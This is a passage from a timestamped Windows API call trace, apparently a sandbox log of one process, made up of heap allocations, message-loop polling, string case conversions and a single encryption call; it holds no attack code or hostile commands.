[0199.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0199.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0199.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0199.052] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34be508*, pdwDataLen=0x8bef68*=0xc2ab, dwBufLen=0xc2b0 | out: pbData=0x34be508*, pdwDataLen=0x8bef68*=0xc2b0) returned 1 [0199.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0199.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0199.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0199.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0199.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0199.053] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0170 [0199.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01b0 [0199.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01e0 [0199.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0199.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01c0 [0199.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0199.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0199.053] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.053] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0170 [0199.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01b0 [0199.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0199.053] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0199.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0199.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0199.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0199.055] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.055] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0199.055] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0199.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0199.055] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0199.055] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0199.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0199.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0199.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.055] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0199.055] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.055] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0199.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0199.056] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0199.056] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0199.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0199.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.056] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0199.056] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.056] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0199.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0199.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.056] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.056] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0199.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0199.057] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.057] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0199.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0199.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0199.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0199.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0199.057] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.057] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.057] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0199.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0199.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0199.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0199.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0199.057] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.057] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.057] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0199.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0199.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.063] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.063] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.063] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0199.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.066] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0199.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0199.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0199.066] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0199.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0199.067] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0199.067] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0199.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0199.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.067] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0199.067] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.067] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0199.067] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.067] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0199.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0199.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0199.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0199.068] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.068] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0199.068] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0199.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0199.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0199.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0199.068] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0199.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0199.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0199.068] CryptDestroyKey (hKey=0xaa58e0) returned 1 [0199.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0199.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0199.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0199.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0199.069] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0199.069] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0199.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0199.069] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0199.069] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0199.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0199.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0199.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0199.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0199.069] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0199.069] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0199.069] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0199.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0199.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0199.069] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0199.070] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0199.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0199.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0199.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0199.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0199.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.070] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0199.070] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0199.070] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0199.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0199.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0199.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0199.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0199.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.070] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0199.070] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0199.070] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.070] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0199.070] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.070] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0199.071] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0199.071] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0199.071] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0199.071] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.071] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.071] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.071] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0199.071] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.071] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0199.071] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.071] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.071] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0199.071] PeekMessageW (in: 